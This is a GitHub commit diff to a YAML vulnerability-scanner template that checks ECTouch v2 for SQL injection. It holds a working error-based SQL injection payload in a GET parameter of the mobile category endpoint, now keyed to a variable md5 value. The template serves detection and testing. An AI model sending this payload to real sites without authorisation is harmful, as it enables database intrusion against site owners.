Update etouch-v2-sqli.yaml

patch-1
Ritik Chaddha 2022-06-30 08:35:53 +05:30 committed by GitHub
parent 967628302d
commit 9ecfdf9a0a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions

View File

@ -9,10 +9,13 @@ info:
- https://www.anquanke.com/post/id/168991
tags: etouch,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
matchers-condition: and
matchers:
@ -22,5 +25,5 @@ requests:
- type: word
words:
- "c4ca4238a0b923820dcc509a6f75849b"
- '{{md5({{num}})}}'
part: body